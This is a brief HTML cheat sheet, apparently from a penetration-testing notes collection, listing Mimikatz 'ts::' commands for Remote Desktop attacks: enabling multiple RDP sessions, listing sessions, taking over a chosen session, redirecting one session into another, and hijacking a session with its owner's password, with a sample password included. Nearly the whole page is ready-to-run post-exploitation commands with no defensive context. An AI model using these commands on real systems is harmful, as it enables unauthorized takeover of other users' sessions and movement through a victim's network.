<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mimikatz - RDP</title>
</head><body><b><u>Allow Multiple RDP sessions</u></b><br/>
<br/>
ts::multirdp<br/>
<br/>
<b><u>List all current sessions</u></b><br/>
<br/>
ts::sessions<br/>
<br/>
<b><u>Takeover specified session</u></b><br/>
<br/>
ts::remote /id:1<br/>
<br/>
<br/>
<b><u>Pass RDP session into other sessions ID</u></b><br/>
<br/>
ts::remote /id:1 /target:2<br/>
<br/>
<u><b>Use password of user who owns sessions</b></u><br/>
<br/>
ts::remote /id:1 /password:F@ll2019!<br/>
<br/>
</body></html>